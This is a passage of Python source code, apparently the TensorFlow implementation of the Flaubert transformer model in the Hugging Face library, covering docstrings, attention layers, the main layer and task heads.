# See all Flaubert models at https://huggingface.co/models?filter=flaubert
]
FLAUBERT_START_DOCSTRING = r"""
This model inherits from [`TFPreTrainedModel`]. Check the superclass documentation for the generic methods the
library implements for all its model (such as downloading or saving, resizing the input embeddings, pruning heads
etc.)
This model is also a [tf.keras.Model](https://www.tensorflow.org/api_docs/python/tf/keras/Model) subclass. Use it
as a regular TF 2.0 Keras Model and refer to the TF 2.0 documentation for all matter related to general usage and
behavior.
<Tip>
TensorFlow models and layers in `transformers` accept two formats as input:
- having all inputs as keyword arguments (like PyTorch models), or
- having all inputs as a list, tuple or dict in the first positional argument.
The reason the second format is supported is that Keras methods prefer this format when passing inputs to models
and layers. Because of this support, when using methods like `model.fit()` things should "just work" for you - just
pass your inputs and labels in any format that `model.fit()` supports! If, however, you want to use the second
format outside of Keras methods like `fit()` and `predict()`, such as when creating your own layers or models with
the Keras `Functional` API, there are three possibilities you can use to gather all the input Tensors in the first
positional argument:
- a single Tensor with `input_ids` only and nothing else: `model(input_ids)`
- a list of varying length with one or several input Tensors IN THE ORDER given in the docstring:
`model([input_ids, attention_mask])` or `model([input_ids, attention_mask, token_type_ids])`
- a dictionary with one or several input Tensors associated to the input names given in the docstring:
`model({"input_ids": input_ids, "token_type_ids": token_type_ids})`
Note that when creating models and layers with
[subclassing](https://keras.io/guides/making_new_layers_and_models_via_subclassing/) then you don't need to worry
about any of this, as you can just pass inputs like you would to any other Python function!
</Tip>
Parameters:
config ([`FlaubertConfig`]): Model configuration class with all the parameters of the model.
Initializing with a config file does not load the weights associated with the model, only the
configuration. Check out the [`~PreTrainedModel.from_pretrained`] method to load the model weights.
"""
FLAUBERT_INPUTS_DOCSTRING = r"""
Args:
input_ids (`Numpy array` or `tf.Tensor` of shape `(batch_size, sequence_length)`):
Indices of input sequence tokens in the vocabulary.
Indices can be obtained using [`AutoTokenizer`]. See [`PreTrainedTokenizer.__call__`] and
[`PreTrainedTokenizer.encode`] for details.
[What are input IDs?](../glossary#input-ids)
attention_mask (`Numpy array` or `tf.Tensor` of shape `(batch_size, sequence_length)`, *optional*):
Mask to avoid performing attention on padding token indices. Mask values selected in `[0, 1]`:
- `1` for tokens that are **not masked**,
- `0` for tokens that are **masked**.
[What are attention masks?](../glossary#attention-mask)
langs (`tf.Tensor` or `Numpy array` of shape `(batch_size, sequence_length)`, *optional*):
A parallel sequence of tokens to be used to indicate the language of each token in the input. Indices are
languages ids which can be obtained from the language names by using two conversion mappings provided in
the configuration of the model (only provided for multilingual models). More precisely, the *language name
to language id* mapping is in `model.config.lang2id` (which is a dictionary string to int) and the
*language id to language name* mapping is in `model.config.id2lang` (dictionary int to string).
See usage examples detailed in the [multilingual documentation](../multilingual).
token_type_ids (`tf.Tensor` or `Numpy array` of shape `(batch_size, sequence_length)`, *optional*):
Segment token indices to indicate first and second portions of the inputs. Indices are selected in `[0,
1]`:
- `0` corresponds to a *sentence A* token,
- `1` corresponds to a *sentence B* token.
[What are token type IDs?](../glossary#token-type-ids)
position_ids (`tf.Tensor` or `Numpy array` of shape `(batch_size, sequence_length)`, *optional*):
Indices of positions of each input sequence tokens in the position embeddings. Selected in the range `[0,
config.max_position_embeddings - 1]`.
[What are position IDs?](../glossary#position-ids)
lengths (`tf.Tensor` or `Numpy array` of shape `(batch_size,)`, *optional*):
Length of each sentence that can be used to avoid performing attention on padding token indices. You can
also use *attention_mask* for the same result (see above), kept here for compatibility Indices selected in
`[0, ..., input_ids.size(-1)]`:
cache (`Dict[str, tf.Tensor]`, *optional*):
Dictionary string to `tf.FloatTensor` that contains precomputed hidden states (key and values in the
attention blocks) as computed by the model (see `cache` output below). Can be used to speed up sequential
decoding.
The dictionary object will be modified in-place during the forward pass to add newly computed
hidden-states.
head_mask (`Numpy array` or `tf.Tensor` of shape `(num_heads,)` or `(num_layers, num_heads)`, *optional*):
Mask to nullify selected heads of the self-attention modules. Mask values selected in `[0, 1]`:
- `1` indicates the head is **not masked**,
- `0` indicates the head is **masked**.
inputs_embeds (`tf.Tensor` of shape `(batch_size, sequence_length, hidden_size)`, *optional*):
Optionally, instead of passing `input_ids` you can choose to directly pass an embedded representation. This
is useful if you want more control over how to convert `input_ids` indices into associated vectors than the
model's internal embedding lookup matrix.
output_attentions (`bool`, *optional*):
Whether or not to return the attentions tensors of all attention layers. See `attentions` under returned
tensors for more detail. This argument can be used only in eager mode, in graph mode the value in the
config will be used instead.
output_hidden_states (`bool`, *optional*):
Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors for
more detail. This argument can be used only in eager mode, in graph mode the value in the config will be
used instead.
return_dict (`bool`, *optional*):
Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple. This argument can be used in
eager mode, in graph mode the value will always be set to True.
training (`bool`, *optional*, defaults to `False`):
Whether or not to use the model in training mode (some modules like dropout modules have different
behaviors between training and evaluation).
"""
def get_masks(slen, lengths, causal, padding_mask=None):
"""
Generate hidden states mask, and optionally an attention mask.
"""
bs = shape_list(lengths)[0]
if padding_mask is not None:
mask = padding_mask
else:
# assert lengths.max().item() <= slen
alen = tf.range(slen, dtype=lengths.dtype)
mask = alen < tf.expand_dims(lengths, axis=1)
# attention mask is the same as mask, or triangular inferior attention (causal)
if causal:
attn_mask = tf.less_equal(
tf.tile(tf.reshape(alen, (1, 1, slen)), (bs, slen, 1)), tf.reshape(alen, (1, slen, 1))
)
else:
attn_mask = mask
# sanity check
# assert shape_list(mask) == [bs, slen]
tf.debugging.assert_equal(shape_list(mask), [bs, slen])
if causal:
tf.debugging.assert_equal(shape_list(attn_mask), [bs, slen, slen])
return mask, attn_mask
class TFFlaubertPreTrainedModel(TFPreTrainedModel):
"""
An abstract class to handle weights initialization and a simple interface for downloading and loading pretrained
models.
"""
config_class = FlaubertConfig
base_model_prefix = "transformer"
@property
def dummy_inputs(self):
# Sometimes Flaubert has language embeddings so don't forget to build them as well if needed
inputs_list = tf.constant([[7, 6, 0, 0, 1], [1, 2, 3, 0, 0], [0, 0, 0, 4, 5]], dtype=tf.int32)
attns_list = tf.constant([[1, 1, 0, 0, 1], [1, 1, 1, 0, 0], [1, 0, 0, 1, 1]], dtype=tf.int32)
if self.config.use_lang_emb and self.config.n_langs > 1:
return {
"input_ids": inputs_list,
"attention_mask": attns_list,
"langs": tf.constant([[1, 1, 0, 0, 1], [1, 1, 1, 0, 0], [1, 0, 0, 1, 1]], dtype=tf.int32),
}
else:
return {"input_ids": inputs_list, "attention_mask": attns_list}
@add_start_docstrings(
"The bare Flaubert Model transformer outputting raw hidden-states without any specific head on top.",
FLAUBERT_START_DOCSTRING,
)
class TFFlaubertModel(TFFlaubertPreTrainedModel):
def __init__(self, config, *inputs, **kwargs):
super().__init__(config, *inputs, **kwargs)
self.transformer = TFFlaubertMainLayer(config, name="transformer")
@unpack_inputs
@add_start_docstrings_to_model_forward(FLAUBERT_INPUTS_DOCSTRING)
@add_code_sample_docstrings(
checkpoint=_CHECKPOINT_FOR_DOC,
output_type=TFBaseModelOutput,
config_class=_CONFIG_FOR_DOC,
)
def call(
self,
input_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
attention_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
langs: Optional[Union[np.ndarray, tf.Tensor]] = None,
token_type_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
position_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
lengths: Optional[Union[np.ndarray, tf.Tensor]] = None,
cache: Optional[Dict[str, tf.Tensor]] = None,
head_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
inputs_embeds: Optional[tf.Tensor] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
training: Optional[bool] = False,
) -> Union[Tuple, TFBaseModelOutput]:
outputs = self.transformer(
input_ids=input_ids,
attention_mask=attention_mask,
langs=langs,
token_type_ids=token_type_ids,
position_ids=position_ids,
lengths=lengths,
cache=cache,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
training=training,
)
return outputs
# Copied from transformers.models.distilbert.modeling_tf_distilbert.TFDistilBertModel.serving_output
def serving_output(self, output):
hs = tf.convert_to_tensor(output.hidden_states) if self.config.output_hidden_states else None
attns = tf.convert_to_tensor(output.attentions) if self.config.output_attentions else None
return TFBaseModelOutput(last_hidden_state=output.last_hidden_state, hidden_states=hs, attentions=attns)
# Copied from transformers.models.xlm.modeling_tf_xlm.TFXLMMultiHeadAttention with XLM->Flaubert
class TFFlaubertMultiHeadAttention(tf.keras.layers.Layer):
NEW_ID = itertools.count()
def __init__(self, n_heads, dim, config, **kwargs):
super().__init__(**kwargs)
self.layer_id = next(TFFlaubertMultiHeadAttention.NEW_ID)
self.dim = dim
self.n_heads = n_heads
self.output_attentions = config.output_attentions
assert self.dim % self.n_heads == 0
self.q_lin = tf.keras.layers.Dense(dim, kernel_initializer=get_initializer(config.init_std), name="q_lin")
self.k_lin = tf.keras.layers.Dense(dim, kernel_initializer=get_initializer(config.init_std), name="k_lin")
self.v_lin = tf.keras.layers.Dense(dim, kernel_initializer=get_initializer(config.init_std), name="v_lin")
self.out_lin = tf.keras.layers.Dense(dim, kernel_initializer=get_initializer(config.init_std), name="out_lin")
self.dropout = tf.keras.layers.Dropout(config.attention_dropout)
self.pruned_heads = set()
def prune_heads(self, heads):
raise NotImplementedError
def call(self, input, mask, kv, cache, head_mask, output_attentions, training=False):
"""
Self-attention (if kv is None) or attention over source sentence (provided by kv).
"""
# Input is (bs, qlen, dim)
# Mask is (bs, klen) (non-causal) or (bs, klen, klen)
bs, qlen, dim = shape_list(input)
if kv is None:
klen = qlen if cache is None else cache["slen"] + qlen
else:
klen = shape_list(kv)[1]
# assert dim == self.dim, f'Dimensions do not match: {dim} input vs {self.dim} configured'
dim_per_head = self.dim // self.n_heads
mask_reshape = (bs, 1, qlen, klen) if len(shape_list(mask)) == 3 else (bs, 1, 1, klen)
def shape(x):
"""projection"""
return tf.transpose(tf.reshape(x, (bs, -1, self.n_heads, dim_per_head)), perm=(0, 2, 1, 3))
def unshape(x):
"""compute context"""
return tf.reshape(tf.transpose(x, perm=(0, 2, 1, 3)), (bs, -1, self.n_heads * dim_per_head))
q = shape(self.q_lin(input)) # (bs, n_heads, qlen, dim_per_head)
if kv is None:
k = shape(self.k_lin(input)) # (bs, n_heads, qlen, dim_per_head)
v = shape(self.v_lin(input)) # (bs, n_heads, qlen, dim_per_head)
elif cache is None or self.layer_id not in cache:
k = v = kv
k = shape(self.k_lin(k)) # (bs, n_heads, qlen, dim_per_head)
v = shape(self.v_lin(v)) # (bs, n_heads, qlen, dim_per_head)
if cache is not None:
if self.layer_id in cache:
if kv is None:
k_, v_ = cache[self.layer_id]
k = tf.concat([k_, k], axis=2) # (bs, n_heads, klen, dim_per_head)
v = tf.concat([v_, v], axis=2) # (bs, n_heads, klen, dim_per_head)
else:
k, v = cache[self.layer_id]
cache[self.layer_id] = (k, v)
f_dim_per_head = tf.cast(dim_per_head, dtype=q.dtype)
q = tf.multiply(q, tf.math.rsqrt(f_dim_per_head)) # (bs, n_heads, qlen, dim_per_head)
k = tf.cast(k, dtype=q.dtype)
scores = tf.matmul(q, k, transpose_b=True) # (bs, n_heads, qlen, klen)
mask = tf.reshape(mask, mask_reshape) # (bs, n_heads, qlen, klen)
# scores.masked_fill_(mask, -float('inf')) # (bs, n_heads, qlen, klen)
mask = tf.cast(mask, dtype=scores.dtype)
scores = scores - 1e30 * (1.0 - mask)
weights = stable_softmax(scores, axis=-1) # (bs, n_heads, qlen, klen)
weights = self.dropout(weights, training=training) # (bs, n_heads, qlen, klen)
# Mask heads if we want to
if head_mask is not None:
weights = weights * head_mask
context = tf.matmul(weights, v) # (bs, n_heads, qlen, dim_per_head)
context = unshape(context) # (bs, qlen, dim)
outputs = (self.out_lin(context),)
if output_attentions:
outputs = outputs + (weights,)
return outputs
# Copied from transformers.models.xlm.modeling_tf_xlm.TFXLMTransformerFFN
class TFFlaubertTransformerFFN(tf.keras.layers.Layer):
def __init__(self, in_dim, dim_hidden, out_dim, config, **kwargs):
super().__init__(**kwargs)
self.lin1 = tf.keras.layers.Dense(dim_hidden, kernel_initializer=get_initializer(config.init_std), name="lin1")
self.lin2 = tf.keras.layers.Dense(out_dim, kernel_initializer=get_initializer(config.init_std), name="lin2")
self.act = get_tf_activation("gelu") if config.gelu_activation else get_tf_activation("relu")
self.dropout = tf.keras.layers.Dropout(config.dropout)
def call(self, input, training=False):
x = self.lin1(input)
x = self.act(x)
x = self.lin2(x)
x = self.dropout(x, training=training)
return x
@keras_serializable
class TFFlaubertMainLayer(tf.keras.layers.Layer):
config_class = FlaubertConfig
def __init__(self, config, **kwargs):
super().__init__(**kwargs)
self.config = config
self.n_heads = config.n_heads
self.n_langs = config.n_langs
self.dim = config.emb_dim
self.hidden_dim = self.dim * 4
self.n_words = config.n_words
self.pad_index = config.pad_index
self.causal = config.causal
self.n_layers = config.n_layers
self.use_lang_emb = config.use_lang_emb
self.layerdrop = getattr(config, "layerdrop", 0.0)
self.pre_norm = getattr(config, "pre_norm", False)
self.output_attentions = config.output_attentions
self.output_hidden_states = config.output_hidden_states
self.return_dict = config.use_return_dict
self.max_position_embeddings = config.max_position_embeddings
self.embed_init_std = config.embed_init_std
self.dropout = tf.keras.layers.Dropout(config.dropout)
self.embeddings = TFSharedEmbeddings(
self.n_words, self.dim, initializer_range=config.embed_init_std, name="embeddings"
)
self.layer_norm_emb = tf.keras.layers.LayerNormalization(epsilon=config.layer_norm_eps, name="layer_norm_emb")
self.attentions = []
self.layer_norm1 = []
self.ffns = []
self.layer_norm2 = []
for i in range(self.n_layers):
self.attentions.append(
TFFlaubertMultiHeadAttention(self.n_heads, self.dim, config=config, name=f"attentions_._{i}")
)
self.layer_norm1.append(
tf.keras.layers.LayerNormalization(epsilon=config.layer_norm_eps, name=f"layer_norm1_._{i}")
)
# if self.is_decoder:
# self.layer_norm15.append(nn.LayerNorm(self.dim, eps=config.layer_norm_eps))
# self.encoder_attn.append(MultiHeadAttention(self.n_heads, self.dim, dropout=self.attention_dropout))
self.ffns.append(
TFFlaubertTransformerFFN(self.dim, self.hidden_dim, self.dim, config=config, name=f"ffns_._{i}")
)
self.layer_norm2.append(
tf.keras.layers.LayerNormalization(epsilon=config.layer_norm_eps, name=f"layer_norm2_._{i}")
)
def build(self, input_shape):
with tf.name_scope("position_embeddings"):
self.position_embeddings = self.add_weight(
name="embeddings",
shape=[self.max_position_embeddings, self.dim],
initializer=get_initializer(self.embed_init_std),
)
if self.n_langs > 1 and self.use_lang_emb:
with tf.name_scope("lang_embeddings"):
self.lang_embeddings = self.add_weight(
name="embeddings",
shape=[self.n_langs, self.dim],
initializer=get_initializer(self.embed_init_std),
)
super().build(input_shape)
def get_input_embeddings(self):
return self.embeddings
def set_input_embeddings(self, value):
self.embeddings.weight = value
self.embeddings.vocab_size = shape_list(value)[0]
@unpack_inputs
def call(
self,
input_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
attention_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
langs: Optional[Union[np.ndarray, tf.Tensor]] = None,
token_type_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
position_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
lengths: Optional[Union[np.ndarray, tf.Tensor]] = None,
cache: Optional[Dict[str, tf.Tensor]] = None,
head_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
inputs_embeds: Optional[tf.Tensor] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
training: Optional[bool] = False,
) -> Union[Tuple, TFBaseModelOutput]:
# removed: src_enc=None, src_len=None
if input_ids is not None and inputs_embeds is not None:
raise ValueError("You cannot specify both input_ids and inputs_embeds at the same time")
elif input_ids is not None:
bs, slen = shape_list(input_ids)
elif inputs_embeds is not None:
bs, slen = shape_list(inputs_embeds)[:2]
else:
raise ValueError("You have to specify either input_ids or inputs_embeds")
if lengths is None:
if input_ids is not None:
lengths = tf.reduce_sum(
tf.cast(tf.not_equal(input_ids, self.pad_index), dtype=input_ids.dtype), axis=1
)
else:
lengths = tf.convert_to_tensor([slen] * bs)
# mask = input_ids != self.pad_index
# check inputs
# assert shape_list(lengths)[0] == bs
tf.debugging.assert_equal(
shape_list(lengths)[0], bs
), f"Expected batch size {shape_list(lengths)[0]} and received batch size {bs} mismatched"
# assert lengths.max().item() <= slen
# input_ids = input_ids.transpose(0, 1) # batch size as dimension 0
# assert (src_enc is None) == (src_len is None)
# if src_enc is not None:
# assert self.is_decoder
# assert src_enc.size(0) == bs
# generate masks
mask, attn_mask = get_masks(slen, lengths, self.causal, padding_mask=attention_mask)
# if self.is_decoder and src_enc is not None:
# src_mask = torch.arange(src_len.max(), dtype=torch.long, device=lengths.device) < src_len[:, None]
# position_ids
if position_ids is None:
position_ids = tf.expand_dims(tf.range(slen), axis=0)
position_ids = tf.tile(position_ids, (bs, 1))
# assert shape_list(position_ids) == [bs, slen] # (slen, bs)
tf.debugging.assert_equal(
shape_list(position_ids), [bs, slen]
), f"Position id shape {shape_list(position_ids)} and input shape {[bs, slen]} mismatched"
# position_ids = position_ids.transpose(0, 1)
# langs
if langs is not None:
# assert shape_list(langs) == [bs, slen] # (slen, bs)
tf.debugging.assert_equal(
shape_list(langs), [bs, slen]
), f"Lang shape {shape_list(langs)} and input shape {[bs, slen]} mismatched"
# langs = langs.transpose(0, 1)
# Prepare head mask if needed
# 1.0 in head_mask indicate we keep the head
# attention_probs has shape bsz x n_heads x N x N
# input head_mask has shape [num_heads] or [num_hidden_layers x num_heads]
# and head_mask is converted to shape [num_hidden_layers x batch x num_heads x qlen x klen]
if head_mask is not None:
raise NotImplementedError
else:
head_mask = [None] * self.n_layers
# do not recompute cached elements
if cache is not None and input_ids is not None:
_slen = slen - cache["slen"]
input_ids = input_ids[:, -_slen:]
position_ids = position_ids[:, -_slen:]
if langs is not None:
langs = langs[:, -_slen:]
mask = mask[:, -_slen:]
attn_mask = attn_mask[:, -_slen:]
# embeddings
if inputs_embeds is None:
# Note: tf.gather, on which the embedding layer is based, won't check positive out of bound
# indices on GPU, returning zeros instead. This is a dangerous silent behavior.
tf.debugging.assert_less(
input_ids,
tf.cast(self.embeddings.vocab_size, dtype=input_ids.dtype),
message=(
"input_ids must be smaller than the embedding layer's input dimension (got"
f" {tf.math.reduce_max(input_ids)} >= {self.embeddings.vocab_size})"
),
)
inputs_embeds = self.embeddings(input_ids)
tensor = inputs_embeds + tf.gather(self.position_embeddings, position_ids)
if langs is not None and self.use_lang_emb:
tensor = tensor + tf.gather(self.lang_embeddings, langs)
if token_type_ids is not None:
tensor = tensor + self.embeddings(token_type_ids)
tensor = self.layer_norm_emb(tensor)
tensor = self.dropout(tensor, training=training)
mask = tf.cast(mask, dtype=tensor.dtype)
tensor = tensor * tf.expand_dims(mask, axis=-1)
# hidden_states and attentions cannot be None in graph mode.
hidden_states = () if output_hidden_states else None
attentions = () if output_attentions else None
# transformer layers
for i in range(self.n_layers):
# LayerDrop
dropout_probability = random.uniform(0, 1)
if training and (dropout_probability < self.layerdrop):
continue
if output_hidden_states:
hidden_states = hidden_states + (tensor,)
# self attention
if not self.pre_norm:
attn_outputs = self.attentions[i](
tensor,
attn_mask,
None,
cache,
head_mask[i],
output_attentions,
training=training,
)
attn = attn_outputs[0]
if output_attentions:
attentions = attentions + (attn_outputs[1],)
attn = self.dropout(attn, training=training)
tensor = tensor + attn
tensor = self.layer_norm1[i](tensor)
else:
tensor_normalized = self.layer_norm1[i](tensor)
attn_outputs = self.attentions[i](
tensor_normalized,
attn_mask,
None,
cache,
head_mask[i],
output_attentions,
training=training,
)
attn = attn_outputs[0]
if output_attentions:
attentions = attentions + (attn_outputs[1],)
attn = self.dropout(attn, training=training)
tensor = tensor + attn
# encoder attention (for decoder only)
# if self.is_decoder and src_enc is not None:
# attn = self.encoder_attn[i](tensor, src_mask, kv=src_enc, cache=cache)
# attn = nn.functional.dropout(attn, p=self.dropout, training=self.training)
# tensor = tensor + attn
# tensor = self.layer_norm15[i](tensor)
# FFN
if not self.pre_norm:
tensor = tensor + self.ffns[i](tensor)
tensor = self.layer_norm2[i](tensor)
else:
tensor_normalized = self.layer_norm2[i](tensor)
tensor = tensor + self.ffns[i](tensor_normalized)
tensor = tensor * tf.expand_dims(mask, axis=-1)
# Add last hidden state
if output_hidden_states:
hidden_states = hidden_states + (tensor,)
# update cache length
if cache is not None:
cache["slen"] += tensor.size(1)
# move back sequence length to dimension 0
# tensor = tensor.transpose(0, 1)
if not return_dict:
return tuple(v for v in [tensor, hidden_states, attentions] if v is not None)
return TFBaseModelOutput(last_hidden_state=tensor, hidden_states=hidden_states, attentions=attentions)
# Copied from transformers.models.xlm.modeling_tf_xlm.TFXLMPredLayer
class TFFlaubertPredLayer(tf.keras.layers.Layer):
"""
Prediction layer (cross_entropy or adaptive_softmax).
"""
def __init__(self, config, input_embeddings, **kwargs):
super().__init__(**kwargs)
self.asm = config.asm
self.n_words = config.n_words
self.pad_index = config.pad_index
if config.asm is False:
self.input_embeddings = input_embeddings
else:
raise NotImplementedError
# self.proj = nn.AdaptiveLogSoftmaxWithLoss(
# in_features=dim,
# n_classes=config.n_words,
# cutoffs=config.asm_cutoffs,
# div_value=config.asm_div_value,
# head_bias=True, # default is False
# )
def build(self, input_shape):
# The output weights are the same as the input embeddings, but there is an output-only bias for each token.
self.bias = self.add_weight(shape=(self.n_words,), initializer="zeros", trainable=True, name="bias")
super().build(input_shape)
def get_output_embeddings(self):
return self.input_embeddings
def set_output_embeddings(self, value):
self.input_embeddings.weight = value
self.input_embeddings.vocab_size = shape_list(value)[0]
def get_bias(self):
return {"bias": self.bias}
def set_bias(self, value):
self.bias = value["bias"]
self.vocab_size = shape_list(value["bias"])[0]
def call(self, hidden_states):
hidden_states = self.input_embeddings(hidden_states, mode="linear")
hidden_states = hidden_states + self.bias
return hidden_states
@dataclass
class TFFlaubertWithLMHeadModelOutput(ModelOutput):
"""
Base class for [`TFFlaubertWithLMHeadModel`] outputs.
Args:
logits (`tf.Tensor` of shape `(batch_size, sequence_length, config.vocab_size)`):
Prediction scores of the language modeling head (scores for each vocabulary token before SoftMax).
hidden_states (`tuple(tf.Tensor)`, *optional*, returned when `output_hidden_states=True` is passed or when `config.output_hidden_states=True`):
Tuple of `tf.Tensor` (one for the output of the embeddings + one for the output of each layer) of shape
`(batch_size, sequence_length, hidden_size)`.
Hidden-states of the model at the output of each layer plus the initial embedding outputs.
attentions (`tuple(tf.Tensor)`, *optional*, returned when `output_attentions=True` is passed or when `config.output_attentions=True`):
Tuple of `tf.Tensor` (one for each layer) of shape `(batch_size, num_heads, sequence_length,
sequence_length)`.
Attentions weights after the attention softmax, used to compute the weighted average in the self-attention
heads.
"""
logits: tf.Tensor = None
hidden_states: Optional[Tuple[tf.Tensor]] = None
attentions: Optional[Tuple[tf.Tensor]] = None
@add_start_docstrings(
"""
The Flaubert Model transformer with a language modeling head on top (linear layer with weights tied to the input
embeddings).
""",
FLAUBERT_START_DOCSTRING,
)
class TFFlaubertWithLMHeadModel(TFFlaubertPreTrainedModel):
def __init__(self, config, *inputs, **kwargs):
super().__init__(config, *inputs, **kwargs)
self.transformer = TFFlaubertMainLayer(config, name="transformer")
self.pred_layer = TFFlaubertPredLayer(config, self.transformer.embeddings, name="pred_layer_._proj")
# Flaubert does not have past caching features
self.supports_xla_generation = False
def get_lm_head(self):
return self.pred_layer
def get_prefix_bias_name(self):
warnings.warn("The method get_prefix_bias_name is deprecated. Please use `get_bias` instead.", FutureWarning)
return self.name + "/" + self.pred_layer.name
def prepare_inputs_for_generation(self, inputs, **kwargs):
mask_token_id = self.config.mask_token_id
lang_id = self.config.lang_id
effective_batch_size = inputs.shape[0]
mask_token = tf.fill((effective_batch_size, 1), 1) * mask_token_id
inputs = tf.concat([inputs, mask_token], axis=1)
if lang_id is not None:
langs = tf.ones_like(inputs) * lang_id
else:
langs = None
return {"input_ids": inputs, "langs": langs}
@unpack_inputs
@add_start_docstrings_to_model_forward(FLAUBERT_INPUTS_DOCSTRING)
@add_code_sample_docstrings(
checkpoint=_CHECKPOINT_FOR_DOC,
output_type=TFFlaubertWithLMHeadModelOutput,
config_class=_CONFIG_FOR_DOC,
)
def call(
self,
input_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
attention_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
langs: Optional[Union[np.ndarray, tf.Tensor]] = None,
token_type_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
position_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
lengths: Optional[Union[np.ndarray, tf.Tensor]] = None,
cache: Optional[Dict[str, tf.Tensor]] = None,
head_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
inputs_embeds: Optional[tf.Tensor] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
training: Optional[bool] = False,
) -> Union[Tuple, TFFlaubertWithLMHeadModelOutput]:
transformer_outputs = self.transformer(
input_ids=input_ids,
attention_mask=attention_mask,
langs=langs,
token_type_ids=token_type_ids,
position_ids=position_ids,
lengths=lengths,
cache=cache,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
training=training,
)
output = transformer_outputs[0]
outputs = self.pred_layer(output)
if not return_dict:
return (outputs,) + transformer_outputs[1:]
return TFFlaubertWithLMHeadModelOutput(
logits=outputs, hidden_states=transformer_outputs.hidden_states, attentions=transformer_outputs.attentions
)
def serving_output(self, output):
hs = tf.convert_to_tensor(output.hidden_states) if self.config.output_hidden_states else None
attns = tf.convert_to_tensor(output.attentions) if self.config.output_attentions else None
return TFFlaubertWithLMHeadModelOutput(logits=output.logits, hidden_states=hs, attentions=attns)
@add_start_docstrings(
"""
Flaubert Model with a sequence classification/regression head on top (a linear layer on top of the pooled output)
e.g. for GLUE tasks.
""",
FLAUBERT_START_DOCSTRING,
)
# Copied from transformers.models.xlm.modeling_tf_xlm.TFXLMForSequenceClassification with XLM_INPUTS->FLAUBERT_INPUTS,XLM->Flaubert
class TFFlaubertForSequenceClassification(TFFlaubertPreTrainedModel, TFSequenceClassificationLoss):
def __init__(self, config, *inputs, **kwargs):
super().__init__(config, *inputs, **kwargs)
self.num_labels = config.num_labels
self.transformer = TFFlaubertMainLayer(config, name="transformer")
self.sequence_summary = TFSequenceSummary(config, initializer_range=config.init_std, name="sequence_summary")
@unpack_inputs
@add_start_docstrings_to_model_forward(FLAUBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
@add_code_sample_docstrings(
checkpoint=_CHECKPOINT_FOR_DOC,
output_type=TFSequenceClassifierOutput,
config_class=_CONFIG_FOR_DOC,
)
def call(
self,
input_ids: Optional[TFModelInputType] = None,
attention_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
langs: Optional[Union[np.ndarray, tf.Tensor]] = None,
token_type_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
position_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
lengths: Optional[Union[np.ndarray, tf.Tensor]] = None,
cache: Optional[Dict[str, tf.Tensor]] = None,
head_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
inputs_embeds: Optional[Union[np.ndarray, tf.Tensor]] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
labels: Optional[Union[np.ndarray, tf.Tensor]] = None,
training: bool = False,
) -> Union[TFSequenceClassifierOutput, Tuple[tf.Tensor]]:
r"""
labels (`tf.Tensor` of shape `(batch_size,)`, *optional*):
Labels for computing the sequence classification/regression loss. Indices should be in `[0, ...,
config.num_labels - 1]`. If `config.num_labels == 1` a regression loss is computed (Mean-Square loss), If
`config.num_labels > 1` a classification loss is computed (Cross-Entropy).
"""
transformer_outputs = self.transformer(
input_ids=input_ids,
attention_mask=attention_mask,
langs=langs,
token_type_ids=token_type_ids,
position_ids=position_ids,
lengths=lengths,
cache=cache,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
training=training,
)
output = transformer_outputs[0]
logits = self.sequence_summary(output)
loss = None if labels is None else self.hf_compute_loss(labels, logits)
if not return_dict:
output = (logits,) + transformer_outputs[1:]
return ((loss,) + output) if loss is not None else output
return TFSequenceClassifierOutput(
loss=loss,
logits=logits,
hidden_states=transformer_outputs.hidden_states,
attentions=transformer_outputs.attentions,
)
# Copied from transformers.models.bert.modeling_tf_bert.TFBertForSequenceClassification.serving_output
def serving_output(self, output: TFSequenceClassifierOutput) -> TFSequenceClassifierOutput:
hs = tf.convert_to_tensor(output.hidden_states) if self.config.output_hidden_states else None
attns = tf.convert_to_tensor(output.attentions) if self.config.output_attentions else None
return TFSequenceClassifierOutput(logits=output.logits, hidden_states=hs, attentions=attns)
@add_start_docstrings(
"""
Flaubert Model with a span classification head on top for extractive question-answering tasks like SQuAD (a linear
layer on top of the hidden-states output to compute `span start logits` and `span end logits`).
""",
FLAUBERT_START_DOCSTRING,
)
# Copied from transformers.models.xlm.modeling_tf_xlm.TFXLMForQuestionAnsweringSimple with XLM_INPUTS->FLAUBERT_INPUTS,XLM->Flaubert
class TFFlaubertForQuestionAnsweringSimple(TFFlaubertPreTrainedModel, TFQuestionAnsweringLoss):
def __init__(self, config, *inputs, **kwargs):
super().__init__(config, *inputs, **kwargs)
self.transformer = TFFlaubertMainLayer(config, name="transformer")
self.qa_outputs = tf.keras.layers.Dense(
